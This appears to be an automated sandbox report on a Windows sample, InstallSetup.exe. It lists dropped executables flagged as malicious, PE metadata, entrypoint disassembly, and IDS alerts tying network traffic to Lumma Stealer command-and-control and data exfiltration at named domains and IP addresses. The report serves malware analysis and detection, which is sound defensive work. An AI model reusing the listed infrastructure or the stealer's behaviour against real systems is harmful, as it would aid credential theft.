Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBCA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4714
Entropy (8bit):	4.474926344113723
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9lup1WpW8VYEYm8M4JxK0O3FV+q8vhK0ODrMTzFTTd:uIjfHI73upE7VMJVwKFqrMTzFTTd
MD5:	C3BC474F500F67DA38B0B13EB2003047
SHA1:	EC0110100B85BE2C6AFF82356CE1C2F36817D2BD
SHA-256:	96ED50F13ACE861F0E79132BF0A657F3C0F2D39AC12B2B5CD6BFF065C6EE6813
SHA-512:	E34118ACFE81303032B4561C93057F978114B536DAB25E09E81BDE22A4822B9205F980FE3F1A2DE3617DA6DFC120EBF8412C6095D8B728EE2555E9B0AD1601B1
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636712" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\InstallSetup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	368128
Entropy (8bit):	6.68436511005947
Encrypted:	false
SSDEEP:	6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
MD5:	9026F04B1266851659FB62C91BD7F2F3
SHA1:	917DA549856FD1CB8876D6AA97F204F46E42A2FE
SHA-256:	174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
SHA-512:	B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Download File

Process:	C:\Users\user\Desktop\InstallSetup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	368128
Entropy (8bit):	6.68436511005947
Encrypted:	false
SSDEEP:	6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
MD5:	9026F04B1266851659FB62C91BD7F2F3
SHA1:	917DA549856FD1CB8876D6AA97F204F46E42A2FE
SHA-256:	174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
SHA-512:	B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372086625602233
Encrypted:	false
SSDEEP:	6144:AFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNuiLm:YV1QyWWI/glMM6kF7Mqm
MD5:	18B96F114E593A107BBA822A4ED7F006
SHA1:	3910541089F7AC14DA5EE07805CDF72A83BBDC7B
SHA-256:	DA90C5E5EB4FADB207E1DBA3E7B62026B7F30D93212A05D1EE45F07EB1080F4C
SHA-512:	329B0EE483FBB0039F204D091C4BF8A11C886B6E3BE0BD2D7385C886398D55B56EFCE2DD69D5FDF2685E20BB3808E91374043487E3EB53432E8A797C1701E08D
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^y.OKQ...............................................................................................................................................................................................................................................................................................................................................r.{........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.028752640974782
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	InstallSetup.exe
File size:	436'736 bytes
MD5:	8d746459e4ecdc159bd431bbc01e9672
SHA1:	7efd87f9513cd69ef9c43fe826895da73a5d679a
SHA256:	7d25ec756bbb5bec2e48dd71255de460789057b354de9dfcf6fce4ee2563d3da
SHA512:	2572fb1ed6b93e037584c133c662d63857a7912f96ef2a42c979230c47d661bc8b3f54de6da965bb3e48947c0c2e0abe4ad22146199e86e77ce701fcc3d37579
SSDEEP:	6144:ewIiV0+zdX91DIfrWMGQn2+MDltVBYVNnHNVHJxCzott/LyxfxaTwdjvH/C:qiVLzdt1UfrDGQn/MDlAtLx86ExawJ6
TLSH:	CF94E010B5F19222F7B38A357976E6A05A3BB5732E30959E2368172F0E703D2CD62717
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#......6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L....<_e...........

File Icon


Icon Hash:	46c7c30b0f4e0d19

Static PE Info

General

Entrypoint:	0x401a04
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x655F3CDB [Thu Nov 23 11:51:55 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	17fedc67c91a23016ced8a879a1b9a8c

Entrypoint Preview

Instruction
call 00007F81CC7B53B5h
jmp 00007F81CC7B164Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456C18h], eax
mov dword ptr [00456C14h], ecx
mov dword ptr [00456C10h], edx
mov dword ptr [00456C0Ch], ebx
mov dword ptr [00456C08h], esi
mov dword ptr [00456C04h], edi
mov word ptr [00456C30h], ss
mov word ptr [00456C24h], cs
mov word ptr [00456C00h], ds
mov word ptr [00456BFCh], es
mov word ptr [00456BF8h], fs
mov word ptr [00456BF4h], gs
pushfd
pop dword ptr [00456C28h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00456C1Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00456C20h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00456C2Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00456B68h], 00010001h
mov eax, dword ptr [00456C20h]
mov dword ptr [00456B1Ch], eax
mov dword ptr [00456B10h], C0000409h
mov dword ptr [00456B14h], 00000001h
mov eax, dword ptr [00454004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00454008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000BCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x528fc	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x431000	0x112f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x52458	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ffac	0x50000	08d1594225d59579d15000c29b9b1d00	False	0.8444610595703125	data	7.547124008280789	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x21ee	0x2200	9cb8e8ab9bc5ad79896b2c2f0957bc3f	False	0.36799172794117646	data	5.5791048271337695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x54000	0x3dc49c	0x7000	0f52e7271309057641b5371a5112169d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x431000	0x112f0	0x11400	775222e062da683a4d4f18725e6beb1f	False	0.5879472373188406	data	5.800080155895508	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4315e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.5101279317697228
RT_ICON	0x432488	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.5658844765342961
RT_ICON	0x432d30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.6002304147465438
RT_ICON	0x4333f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.6394508670520231
RT_ICON	0x433960	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.4099585062240664
RT_ICON	0x435f08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.4793621013133208
RT_ICON	0x436fb0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.47704918032786886
RT_ICON	0x437938	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.5806737588652482
RT_ICON	0x437e18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.8275586353944563
RT_ICON	0x438cc0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.8646209386281588
RT_ICON	0x439568	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.7943548387096774
RT_ICON	0x439c30	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.8692196531791907
RT_ICON	0x43a198	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.8049792531120332
RT_ICON	0x43c740	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.8344277673545967
RT_ICON	0x43d7e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.844672131147541
RT_ICON	0x43e170	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8643617021276596
RT_STRING	0x43e808	0x386	data			0.4567627494456763
RT_STRING	0x43eb90	0xb2	data			0.601123595505618
RT_STRING	0x43ec48	0x6d0	data			0.4288990825688073
RT_STRING	0x43f318	0x71e	data			0.4313940724478595
RT_STRING	0x43fa38	0x6e2	data			0.43473325766174803
RT_STRING	0x440120	0x65c	data			0.43611793611793614
RT_STRING	0x440780	0x71a	data			0.4251925192519252
RT_STRING	0x440ea0	0x7c8	data			0.41967871485943775
RT_STRING	0x441668	0x756	data			0.4222577209797657
RT_STRING	0x441dc0	0x52e	data			0.4517345399698341
RT_GROUP_ICON	0x43e5d8	0x76	data	Turkmen	Turkmenistan	0.6694915254237288
RT_GROUP_ICON	0x437da0	0x76	data	Turkmen	Turkmenistan	0.6610169491525424
RT_VERSION	0x43e650	0x1b4	data			0.5688073394495413

Imports

DLL

Import

KERNEL32.dll

SetDefaultCommConfigA, SearchPathW, SetLocaleInfoA, SetErrorMode, InterlockedIncrement, InterlockedDecrement, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, SetEvent, GetModuleHandleW, GetDateFormatA, GetCommandLineA, SetProcessPriorityBoost, LoadLibraryW, DeleteVolumeMountPointW, GetConsoleAliasW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, AddAtomA, FoldStringA, CreatePipe, GetModuleHandleA, OpenFileMappingW, GetShortPathNameW, EndUpdateResourceA, GetVersionExA, FindFirstVolumeW, UnregisterWaitEx, HeapAlloc, MultiByteToWideChar, GetLastError, HeapReAlloc, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

USER32.dll

GetProcessDefaultLayout

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T13:49:26.142876+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49704	172.67.179.207	443	TCP
2024-12-18T13:49:27.727047+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49705	176.113.115.19	80	TCP
2024-12-18T13:49:31.512750+0100	2058374	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)	1	192.168.2.8	65277	1.1.1.1	53	UDP
2024-12-18T13:49:33.272870+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.8	49706	172.67.220.223	443	TCP
2024-12-18T13:49:33.272870+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49706	172.67.220.223	443	TCP
2024-12-18T13:49:33.991819+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49706	172.67.220.223	443	TCP
2024-12-18T13:49:33.991819+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49706	172.67.220.223	443	TCP
2024-12-18T13:49:35.220835+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.8	49707	172.67.220.223	443	TCP
2024-12-18T13:49:35.220835+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49707	172.67.220.223	443	TCP
2024-12-18T13:49:36.045088+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.8	49707	172.67.220.223	443	TCP
2024-12-18T13:49:36.045088+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49707	172.67.220.223	443	TCP
2024-12-18T13:49:38.123685+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.8	49708	172.67.220.223	443	TCP
2024-12-18T13:49:38.123685+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49708	172.67.220.223	443	TCP
2024-12-18T13:49:40.368864+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.8	49711	172.67.220.223	443	TCP
2024-12-18T13:49:40.368864+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49711	172.67.220.223	443	TCP
2024-12-18T13:49:41.130163+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	49711	172.67.220.223	443	TCP
2024-12-18T13:49:42.726217+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.8	49714	172.67.220.223	443	TCP
2024-12-18T13:49:42.726217+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49714	172.67.220.223	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 13:49:24.003092051 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:24.003134012 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:24.003235102 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:24.015711069 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:24.015733004 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:25.240678072 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:25.240775108 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:25.613464117 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:25.613497019 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:25.613848925 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:25.613888979 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:25.619827032 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:25.667334080 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:26.142862082 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:26.142935991 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:26.143016100 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:26.143076897 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:26.145106077 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:26.145131111 CET	443	49704	172.67.179.207	192.168.2.8
Dec 18, 2024 13:49:26.145152092 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:26.145178080 CET	49704	443	192.168.2.8	172.67.179.207
Dec 18, 2024 13:49:26.279165983 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:26.398850918 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:26.398933887 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:26.399105072 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:26.520531893 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.726911068 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.726962090 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727046967 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.727072954 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.727119923 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727161884 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.727166891 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727180958 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727206945 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.727220058 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.727324963 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727339029 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727368116 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.727382898 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727387905 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.727395058 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727406025 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.727421045 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.729582071 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.847012997 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.847028017 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.847100973 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.851058960 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.851119995 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.851144075 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.851195097 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.859695911 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.859781027 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.919183969 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.919277906 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.919354916 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.919405937 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.921986103 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.922029972 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.922101021 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.922142029 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.930269957 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.930346012 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.930507898 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.930562019 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.938741922 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.938791990 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.938831091 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.938858032 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.947264910 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.947319031 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.947521925 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.947563887 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.955789089 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.955835104 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.955966949 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.956104994 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.964293957 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.964359045 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.964359999 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.964390039 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.972969055 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.972990990 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.973038912 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.973057985 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.980526924 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.980576038 CET	80	49705	176.113.115.19	192.168.2.8
Dec 18, 2024 13:49:27.980598927 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.980618000 CET	49705	80	192.168.2.8	176.113.115.19
Dec 18, 2024 13:49:27.988333941 CET	80	49705	176.113.115.19	192.168.2.8
